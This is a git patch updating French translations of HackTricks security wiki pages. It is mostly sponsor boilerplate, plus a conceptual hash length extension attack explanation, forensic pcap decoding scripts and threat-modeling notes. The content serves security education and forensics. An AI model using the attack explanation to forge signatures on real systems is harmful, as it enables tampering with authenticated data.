From 6ff7ee387a8358d93955baee95fe2f3fb3a4b97b Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 18 Apr 2024 04:01:29 +0000 Subject: [PATCH] Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack. --- README.md | 18 ++-- .../hash-length-extension-attack.md | 22 ++--- .../pcap-inspection/dnscat-exfiltration.md | 25 ++++-- .../pcap-inspection/wireshark-tricks.md | 58 +++++++++---- .../threat-modeling.md | 26 +++--- .../escaping-from-gui-applications.md | 60 ++++++------- .../pam-pluggable-authentication-modules.md | 22 ++--- .../docker-security/apparmor.md | 66 ++++++++------- .../docker-release_agent-cgroups-escape.md | 24 +++--- .../macos-red-teaming/macos-keychain.md | 84 +++++++++---------- .../macos-memory-dumping.md | 20 ++--- .../macos-users.md | 42 ++++------ .../reversing-native-libraries.md | 17 ++-- .../frida-configuration-in-ios.md | 32 +++---- .../1723-pentesting-pptp.md | 12 +-- .../1883-pentesting-mqtt-mosquitto.md | 74 ++++++++-------- .../2375-pentesting-docker.md | 28 +++---- network-services-pentesting/pentesting-irc.md | 16 ++-- .../basic-voip-protocols/README.md | 36 ++++---- .../electron-desktop-apps/README.md | 52 ++++++------ .../iis-internet-information-services.md | 36 ++++---- pentesting-web/2fa-bypass.md | 25 ++++-- .../client-side-template-injection-csti.md | 22 ++--- .../express-prototype-pollution-gadgets.md | 22 ++--- ..._stream_prefer_studio-+-path-disclosure.md | 28 +++---- .../lfi2rce-via-nginx-temp-files.md | 46 +++++----- .../postmessage-vulnerabilities/README.md | 28 +++---- .../registration-vulnerabilities.md | 32 +++---- .../el-expression-language.md | 22 ++--- .../unicode-normalization.md | 20 ++--- physical-attacks/physical-attacks.md | 44 ++++++++-- todo/hardware-hacking/uart.md | 34 ++++---- .../access-tokens.md | 33 ++++---- .../juicypotato.md | 40 ++++----- .../roguepotato-and-printspoofer.md | 12 ++- 35 files changed, 619 insertions(+), 559 deletions(-) diff --git a/README.md b/README.md index 2031bc487..49948376c 100644 --- a/README.md +++ b/README.md @@ -44,7 +44,7 @@ Vous pouvez consulter leur **blog** sur [**https://blog.stmcyber.com**](https:// **Intigriti** est la plateforme de **bug bounty** et de **piratage éthique n°1 en Europe.** -**Astuce de bug bounty**: **Inscrivez-vous** sur **Intigriti**, une **plateforme de bug bounty premium créée par des pirates, pour des pirates**! Rejoignez-nous sur [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) aujourd'hui et commencez à gagner des primes allant jusqu'à **100 000 $**! +**Astuce de bug bounty**: **Inscrivez-vous** sur **Intigriti**, une **plateforme de bug bounty premium créée par des hackers, pour des hackers**! Rejoignez-nous sur [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) aujourd'hui, et commencez à gagner des primes allant jusqu'à **100 000 $**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -55,7 +55,7 @@ Vous pouvez consulter leur **blog** sur [**https://blog.stmcyber.com**](https://
\ -Utilisez [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) pour construire et **automatiser facilement des workflows** alimentés par les outils communautaires les plus avancés au monde. +Utilisez [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) pour construire et **automatiser des workflows** alimentés par les outils communautaires les plus avancés au monde. Accédez dès aujourd'hui: @@ -67,13 +67,13 @@ Accédez dès aujourd'hui:
-Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) pour communiquer avec des pirates expérimentés et des chasseurs de primes! +Rejoignez le serveur [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) pour communiquer avec des hackers expérimentés et des chasseurs de primes! * **Perspectives de Piratage:** Impliquez-vous dans du contenu qui explore l'excitation et les défis du piratage * **Actualités de Piratage en Temps Réel:** Restez informé sur le monde du piratage à rythme rapide grâce aux actualités et perspectives en temps réel -* **Dernières Annonces:** Restez informé des derniers lancements de bug bounties et des mises à jour cruciales de la plateforme +* **Dernières Annonces:** Restez informé des derniers bug bounties lancés et des mises à jour cruciales de la plateforme -**Rejoignez-nous sur** [**Discord**](https://discord.com/invite/N3FrSbmwdy) et commencez à collaborer avec les meilleurs pirates dès aujourd'hui! +**Rejoignez-nous sur** [**Discord**](https://discord.com/invite/N3FrSbmwdy) et commencez à collaborer avec les meilleurs hackers dès aujourd'hui! *** @@ -116,16 +116,16 @@ Vous pouvez **créer un compte gratuit** [**ici**](https://serpapi.com/users/sig [**WebSec**](https://websec.nl) est une entreprise de cybersécurité professionnelle basée à **Amsterdam** qui aide à **protéger** les entreprises **du monde entier** contre les dernières menaces en cybersécurité en fournissant des services de **sécurité offensive** avec une **approche moderne**. -WebSec est une entreprise de sécurité **tout-en-un**, ce qui signifie qu'ils font tout; Tests d'intrusion, Audits de sécurité, Formations en sensibilisation, Campagnes de phishing, Revue de code, Développement d'exploits, Externalisation d'experts en sécurité et bien plus encore. +WebSec est une **entreprise de sécurité tout-en-un** ce qui signifie qu'ils font tout; Tests d'intrusion, Audits de sécurité, Formations en sensibilisation, Campagnes de phishing, Revue de code, Développement d'exploits, Externalisation d'experts en sécurité et bien plus encore. Une autre chose cool à propos de WebSec est que contrairement à la moyenne de l'industrie, WebSec est **très confiant dans ses compétences**, à tel point qu'ils **garantissent les meilleurs résultats de qualité**, il est indiqué sur leur site web "**Si nous ne pouvons pas le pirater, vous ne le payez pas!**". Pour plus d'informations, consultez leur [**site web**](https://websec.nl/en/) et leur [**blog**](https://websec.nl/blog/)! En plus de ce qui précède, WebSec est également un **supporter engagé de HackTricks.** {% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %} -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **malwares voleurs**. @@ -151,7 +151,7 @@ Autres façons de soutenir HackTricks : * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/crypto-and-stego/hash-length-extension-attack.md b/crypto-and-stego/hash-length-extension-attack.md index 4cea88a28..232e861d6 100644 --- a/crypto-and-stego/hash-length-extension-attack.md +++ b/crypto-and-stego/hash-length-extension-attack.md @@ -1,20 +1,20 @@
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)! Autres façons de soutenir HackTricks : * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub.
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -30,14 +30,14 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur Imaginez un serveur qui **signe** des **données** en **ajoutant** un **secret** à des données en clair connues, puis en hachant ces données. Si vous connaissez : -* **La longueur du secret** (celle-ci peut également être forcée dans une plage de longueurs données) +* **La longueur du secret** (cela peut également être obtenu par force brute dans une plage de longueurs donnée) * **Les données en clair** * **L'algorithme (et s'il est vulnérable à cette attaque)** * **Le padding est connu** * Habituellement, un padding par défaut est utilisé, donc si les 3 autres conditions sont remplies, celui-ci l'est aussi -* Le padding varie en fonction de la longueur du secret+des données, c'est pourquoi la longueur du secret est nécessaire +* Le padding varie en fonction de la longueur du secret + des données, c'est pourquoi la longueur du secret est nécessaire -Alors, il est possible pour un **attaquant** d'**ajouter** des **données** et de **générer** une signature valide pour les **données précédentes + données ajoutées**. +Alors, il est possible pour un **attaquant** d'**ajouter** des **données** et de **générer** une signature valide pour les **données précédentes + les données ajoutées**. ## Comment ? @@ -59,9 +59,9 @@ Si un attaquant souhaite ajouter la chaîne "append", il peut : Vous pouvez trouver cette attaque bien expliquée dans [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. @@ -73,13 +73,13 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur
-Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)! Autres façons de soutenir HackTricks : * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub. diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md index 6e5a92636..b410bd783 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md @@ -2,9 +2,9 @@ Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)! -Autres façons de soutenir HackTricks: +Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! +* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** @@ -12,10 +12,23 @@ Autres façons de soutenir HackTricks:
+### [WhiteIntel](https://whiteintel.io) + +
+ +[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. + +Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. + +Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : + +{% embed url="https://whiteintel.io" %} + +--- Si vous avez un pcap avec des données **exfiltrées par DNSCat** (sans utilisation de chiffrement), vous pouvez trouver le contenu exfiltré. -Vous devez seulement savoir que les **9 premiers octets** ne sont pas des données réelles mais sont liés à la **communication C\&C**: +Vous devez seulement savoir que les **9 premiers octets** ne sont pas des données réelles mais sont liés à la **communication C\&C** : ```python from scapy.all import rdpcap, DNSQR, DNSRR import struct @@ -44,14 +57,14 @@ python3 dnscat_decoder.py sample.pcap bad_domain ```
-Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! +Apprenez le piratage AWS de zéro à héros avec htARTE (Expert de l'équipe rouge AWS de HackTricks)! -D'autres façons de soutenir HackTricks: +Autres façons de soutenir HackTricks: * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) * Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) dépôts GitHub. +* **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md index 25e235fae..a2d8e52ec 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md @@ -1,7 +1,5 @@ # Astuces Wireshark -## Astuces Wireshark -
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! @@ -16,6 +14,20 @@ Autres façons de soutenir HackTricks :
+### [WhiteIntel](https://whiteintel.io) + +
+ +[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. + +Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. + +Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : + +{% embed url="https://whiteintel.io" %} + +--- + ## Améliorez vos compétences Wireshark ### Tutoriels @@ -31,49 +43,49 @@ Les tutoriels suivants sont excellents pour apprendre quelques astuces de base i **Informations d'expert** -En cliquant sur _**Analyser** --> **Informations d'expert**_ vous aurez un **aperçu** de ce qui se passe dans les paquets **analysés** : +En cliquant sur _**Analyser** --> **Informations d'expert**_, vous aurez un **aperçu** de ce qui se passe dans les paquets **analysés** : ![](<../../../.gitbook/assets/image (253).png>) **Adresses résolues** -Sous _**Statistiques --> Adresses résolues**_ vous pouvez trouver plusieurs **informations** qui ont été "**résolues**" par Wireshark comme le port/transport vers le protocole, l'adresse MAC vers le fabricant, etc. Il est intéressant de savoir ce qui est impliqué dans la communication. +Sous _**Statistiques --> Adresses résolues**_, vous pouvez trouver plusieurs **informations** qui ont été "**résolues**" par Wireshark comme le port/transport au protocole, l'adresse MAC au fabricant, etc. Il est intéressant de savoir ce qui est impliqué dans la communication. ![](<../../../.gitbook/assets/image (890).png>) **Hiérarchie des protocoles** -Sous _**Statistiques --> Hiérarchie des protocoles**_ vous pouvez trouver les **protocoles** **impliqués** dans la communication et des données à leur sujet. +Sous _**Statistiques --> Hiérarchie des protocoles**_, vous pouvez trouver les **protocoles** **impliqués** dans la communication et des données à leur sujet. ![](<../../../.gitbook/assets/image (583).png>) **Conversations** -Sous _**Statistiques --> Conversations**_ vous pouvez trouver un **résumé des conversations** dans la communication et des données à leur sujet. +Sous _**Statistiques --> Conversations**_, vous pouvez trouver un **résumé des conversations** dans la communication et des données à leur sujet. ![](<../../../.gitbook/assets/image (450).png>) -**Points d'extrémité** +**Points de terminaison** -Sous _**Statistiques --> Points d'extrémité**_ vous pouvez trouver un **résumé des points d'extrémité** dans la communication et des données à leur sujet. +Sous _**Statistiques --> Points de terminaison**_, vous pouvez trouver un **résumé des points de terminaison** dans la communication et des données à leur sujet. ![](<../../../.gitbook/assets/image (893).png>) **Infos DNS** -Sous _**Statistiques --> DNS**_ vous pouvez trouver des statistiques sur les requêtes DNS capturées. +Sous _**Statistiques --> DNS**_, vous pouvez trouver des statistiques sur les requêtes DNS capturées. ![](<../../../.gitbook/assets/image (1060).png>) **Graphique E/S** -Sous _**Statistiques --> Graphique E/S**_ vous pouvez trouver un **graphique de la communication**. +Sous _**Statistiques --> Graphique E/S**_, vous pouvez trouver un **graphique de la communication**. ![](<../../../.gitbook/assets/image (989).png>) ### Filtres -Ici vous pouvez trouver des filtres Wireshark en fonction du protocole : [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ +Ici, vous pouvez trouver des filtres Wireshark en fonction du protocole : [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\ Autres filtres intéressants : - `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)` @@ -85,7 +97,7 @@ Autres filtres intéressants : ### Recherche -Si vous souhaitez **rechercher** du **contenu** à l'intérieur des **paquets** des sessions, appuyez sur _CTRL+f_. Vous pouvez ajouter de nouvelles couches à la barre d'informations principale (No., Temps, Source, etc.) en appuyant sur le bouton droit puis sur modifier la colonne. +Si vous souhaitez **rechercher** du **contenu** à l'intérieur des **paquets** des sessions, appuyez sur _CTRL+f_. Vous pouvez ajouter de nouvelles couches à la barre d'informations principale (N°, Heure, Source, etc.) en appuyant sur le bouton droit, puis sur modifier la colonne. ### Laboratoires pcap gratuits @@ -136,10 +148,9 @@ Un fichier de clés partagées ressemblera à ceci : Pour importer cela dans Wireshark, allez à \_modifier > préférence > protocole > ssl > et importez-le dans (Pré)-Master-Secret log filename : ![](<../../../.gitbook/assets/image (986).png>) - ## Communication ADB -Extraire un APK d'une communication ADB où l'APK a été envoyé : +Extraire un APK à partir d'une communication ADB où l'APK a été envoyé : ```python from scapy.all import * @@ -166,15 +177,28 @@ f = open('all_bytes.data', 'w+b') f.write(all_bytes) f.close() ``` +### [WhiteIntel](https://whiteintel.io) + +
+ +[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. + +Leur objectif principal est de lutter contre les piratages de comptes et les attaques de ransomware résultant de logiciels malveillants volant des informations. + +Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : + +{% embed url="https://whiteintel.io" %} + +
Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! -D'autres façons de soutenir HackTricks : +Autres façons de soutenir HackTricks : -* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! +* Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop)! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) -* Découvrez [**La famille PEASS**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) +* Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family) * **Rejoignez le** 💬 [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe Telegram**](https://t.me/peass) ou **suivez-nous** sur **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Partagez vos astuces de piratage en soumettant des PR aux** [**HackTricks**](https://github.com/carlospolop/hacktricks) et [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. diff --git a/generic-methodologies-and-resources/threat-modeling.md b/generic-methodologies-and-resources/threat-modeling.md index 4d5ca8a16..c226a3b46 100644 --- a/generic-methodologies-and-resources/threat-modeling.md +++ b/generic-methodologies-and-resources/threat-modeling.md @@ -1,12 +1,12 @@ # Modélisation des Menaces -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. -Le but principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. +L'objectif principal de WhiteIntel est de lutter contre les prises de contrôle de compte et les attaques de ransomware résultant de logiciels malveillants volant des informations. Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur : @@ -16,12 +16,12 @@ Vous pouvez consulter leur site Web et essayer leur moteur **gratuitement** sur ## Modélisation des Menaces -Bienvenue dans le guide complet de HackTricks sur la modélisation des menaces ! Lancez-vous dans une exploration de cet aspect critique de la cybersécurité, où nous identifions, comprenons et élaborons des stratégies contre les vulnérabilités potentielles d'un système. Ce fil conducteur sert de guide étape par étape rempli d'exemples concrets, de logiciels utiles et d'explications faciles à comprendre. Idéal pour les novices et les praticiens expérimentés cherchant à renforcer leurs défenses en cybersécurité. +Bienvenue dans le guide complet de HackTricks sur la modélisation des menaces ! Lancez-vous dans une exploration de cet aspect crucial de la cybersécurité, où nous identifions, comprenons et élaborons des stratégies contre les vulnérabilités potentielles d'un système. Ce fil conducteur sert de guide étape par étape rempli d'exemples concrets, de logiciels utiles et d'explications faciles à comprendre. Idéal pour les novices et les praticiens expérimentés cherchant à renforcer leurs défenses en cybersécurité. ### Scénarios Couramment Utilisés 1. **Développement de Logiciels** : Dans le cadre du Cycle de Vie de Développement de Logiciels Sécurisé (SSDLC), la modélisation des menaces aide à **identifier les sources potentielles de vulnérabilités** dès les premières étapes du développement. -2. **Tests de Pénétration** : Le cadre d'exécution des tests de pénétration (PTES) exige la **modélisation des menaces pour comprendre les vulnérabilités du système** avant d'effectuer le test. +2. **Tests de Pénétration** : Le cadre d'exécution des tests de pénétration (PTES) exige la modélisation des menaces pour comprendre les vulnérabilités du système avant d'effectuer le test. ### Modèle de Menace en Bref @@ -31,7 +31,7 @@ Les modèles de menace comportent souvent des éléments marqués en rouge, symb ### La Triade CIA -La Triade CIA est un modèle largement reconnu dans le domaine de la sécurité de l'information, représentant la Confidentialité, l'Intégrité et la Disponibilité. Ces trois piliers constituent la base sur laquelle de nombreuses mesures de sécurité et politiques sont construites, y compris les méthodologies de modélisation des menaces. +La Triade CIA est un modèle largement reconnu dans le domaine de la sécurité de l'information, représentant la Confidentialité, l'Intégrité et la Disponibilité. Ces trois piliers forment la base sur laquelle de nombreuses mesures de sécurité et politiques sont construites, y compris les méthodologies de modélisation des menaces. 1. **Confidentialité** : Garantir que les données ou le système ne sont pas accessibles par des individus non autorisés. Il s'agit d'un aspect central de la sécurité, nécessitant des contrôles d'accès appropriés, le chiffrement et d'autres mesures pour prévenir les violations de données. 2. **Intégrité** : L'exactitude, la cohérence et la fiabilité des données tout au long de leur cycle de vie. Ce principe garantit que les données ne sont pas altérées ou manipulées par des parties non autorisées. Il implique souvent des sommes de contrôle, des hachages et d'autres méthodes de vérification des données. @@ -40,11 +40,11 @@ La Triade CIA est un modèle largement reconnu dans le domaine de la sécurité ### Méthodologies de Modélisation des Menaces 1. **STRIDE** : Développé par Microsoft, STRIDE est un acronyme pour **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service et Elevation of Privilege**. Chaque catégorie représente un type de menace, et cette méthodologie est couramment utilisée dans la phase de conception d'un programme ou d'un système pour identifier les menaces potentielles. -2. **DREAD** : Il s'agit d'une autre méthodologie de Microsoft utilisée pour l'évaluation des risques des menaces identifiées. DREAD signifie **Dommages potentiels, Reproductibilité, Exploitabilité, Utilisateurs affectés et Découvrabilité**. Chacun de ces facteurs est évalué, et le résultat est utilisé pour prioriser les menaces identifiées. +2. **DREAD** : Il s'agit d'une autre méthodologie de Microsoft utilisée pour l'évaluation des risques des menaces identifiées. DREAD signifie **Damage potential, Reproducibility, Exploitability, Affected users et Discoverability**. Chacun de ces facteurs est noté, et le résultat est utilisé pour prioriser les menaces identifiées. 3. **PASTA** (Process for Attack Simulation and Threat Analysis) : Il s'agit d'une méthodologie en sept étapes, centrée sur les risques. Elle comprend la définition et l'identification des objectifs de sécurité, la création d'un périmètre technique, la décomposition de l'application, l'analyse des menaces, l'analyse des vulnérabilités et l'évaluation des risques/triages. 4. **Trike** : Il s'agit d'une méthodologie basée sur les risques qui se concentre sur la défense des actifs. Elle part d'une perspective de **gestion des risques** et examine les menaces et les vulnérabilités dans ce contexte. -5. **VAST** (Visual, Agile, and Simple Threat modeling) : Cette approche vise à être plus accessible et s'intègre dans les environnements de développement Agile. Elle combine des éléments des autres méthodologies et se concentre sur les **représentations visuelles des menaces**. -6. **OCTAVE** (Operationally Critical Threat, Asset, and Vulnerability Evaluation) : Développé par le CERT Coordination Center, ce cadre est orienté vers l'**évaluation des risques organisationnels plutôt que des systèmes ou des logiciels spécifiques**. +5. **VAST** (Visual, Agile et Simple Threat modeling) : Cette approche vise à être plus accessible et s'intègre dans les environnements de développement Agile. Elle combine des éléments des autres méthodologies et se concentre sur les **représentations visuelles des menaces**. +6. **OCTAVE** (Operationally Critical Threat, Asset et Vulnerability Evaluation) : Développé par le CERT Coordination Center, ce cadre est axé sur **l'évaluation des risques organisationnels plutôt que sur des systèmes ou des logiciels spécifiques**. ## Outils @@ -52,7 +52,7 @@ Il existe plusieurs outils et solutions logicielles disponibles qui peuvent **ai ### [SpiderSuite](https://github.com/3nock/SpiderSuite) -Une araignée/crawler web GUI avancée multiplateforme et multifonctionnelle pour les professionnels de la cybersécurité. Spider Suite peut être utilisé pour la cartographie et l'analyse de la surface d'attaque. +Une araignée/crawler web GUI multiplateforme avancée et multi-fonctionnelle pour les professionnels de la cybersécurité. Spider Suite peut être utilisé pour la cartographie et l'analyse de la surface d'attaque. **Utilisation** @@ -78,7 +78,7 @@ Parfois, cela pourrait ressembler à ceci :
-2. Lancez le Nouveau Projet +2. Lancez un Nouveau Projet
@@ -124,9 +124,9 @@ Maintenant, votre modèle fini devrait ressembler à ceci. Et voilà comment vou Il s'agit d'un outil gratuit de Microsoft qui aide à trouver les menaces dans la phase de conception des projets logiciels. Il utilise la méthodologie STRIDE et est particulièrement adapté à ceux qui développent sur la pile technologique de Microsoft. -## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
[**WhiteIntel**](https://whiteintel.io) est un moteur de recherche alimenté par le **dark web** qui offre des fonctionnalités **gratuites** pour vérifier si une entreprise ou ses clients ont été **compromis** par des **logiciels malveillants voleurs**. diff --git a/hardware-physical-access/escaping-from-gui-applications.md b/hardware-physical-access/escaping-from-gui-applications.md index cd8e7dfbc..d18963725 100644 --- a/hardware-physical-access/escaping-from-gui-applications.md +++ b/hardware-physical-access/escaping-from-gui-applications.md @@ -2,7 +2,7 @@ Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)! -Autres façons de soutenir HackTricks : +D'autres façons de soutenir HackTricks : * Si vous souhaitez voir votre **entreprise annoncée dans HackTricks** ou **télécharger HackTricks en PDF**, consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! * Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) @@ -12,9 +12,9 @@ Autres façons de soutenir HackTricks :
-## WhiteIntel +### [WhiteIntel](https://whiteintel.io) -
+
